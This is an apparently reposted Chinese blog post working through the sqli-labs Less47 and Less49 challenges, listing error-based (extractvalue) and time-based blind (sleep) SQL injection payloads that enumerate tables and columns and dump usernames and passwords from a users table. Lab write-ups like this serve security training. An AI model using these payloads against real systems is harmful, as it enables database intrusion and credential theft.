当前位置:网站首页>SQL注入 Less47(报错注入) 和Less49(时间盲注)
SQL注入 Less47(报错注入) 和Less49(时间盲注)
2022-07-31 02:27:00 【开心星人】
Less47和Less49都用不了rand()布尔盲注
因为有单引号闭合order by 'rand()' 这条语句显然是执行不了的
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- Teach you how to configure Jenkins automated email notifications
- STM32CUBEMX开发GD32F303(11)----ADC在DMA模式下扫描多个通道
- 医疗影像领域AI软件开发流程
- Mathematical Ideas in AI
- 拒绝加班,程序员开发的效率工具集
- 19. Support Vector Machines - Intuitive Understanding of Optimization Objectives and Large Spacing
- Drools规则属性,高级语法
- mysql 视图
- Brute Force/Adjacency List Breadth First Directed Weighted Graph Undirected Weighted Graph
- First acquaintance with C language -- array
猜你喜欢

Observer mode (1)

f.grid_sample

19.支持向量机-优化目标和大间距直观理解

Software testing basic interface testing - getting started with Jmeter, you should pay attention to these things
![LeetCode 1161 最大层内元素和[BFS 二叉树] HERODING的LeetCode之路](/img/56/fcc8ee6f592abf0a374fc950a3362f.png)
LeetCode 1161 最大层内元素和[BFS 二叉树] HERODING的LeetCode之路

What have I experienced to become a tester who is harder than development?

The effective square of the test (one question of the day 7/29)

用户交互+格式化输出

leetcode-1161: Maximum in-layer element sum

Problems that need to be solved by the tcp framework
随机推荐
Brute Force/Adjacency List Breadth First Directed Weighted Graph Undirected Weighted Graph
Go 项目实战-获取多级分类下的全部商品
PDF split/merge
f.grid_sample
Intranet Infiltration - Privilege Escalation
tcp框架需要解决的问题
934. The Shortest Bridge
uniapp uses 3rd party fonts
Android's webview cache related knowledge collection
Classic linked list OJ strong training problem - fast and slow double pointer efficient solution
Drools Rule Properties, Advanced Syntax
There is a problem with the multiplayer-hlap package and the solution cannot be upgraded
Maximum monthly salary of 20K?The average salary is nearly 10,000... What is the experience of working in a Huawei subsidiary?
Arbitrum Interview | L2 Summer, what does the standout Arbitrum bring to developers?
Arbitrum 专访 | L2 Summer, 脱颖而出的 Arbitrum 为开发者带来了什么?
Manchester City confuses fans with smart scarf that detects emotions
To write good test cases, you must first learn test design
16. Registration Center-consul
The modification is not properly placed in the sandbox, causing Apple compatibility issues
直播预告 | KDD2022博士论文奖冠亚军对话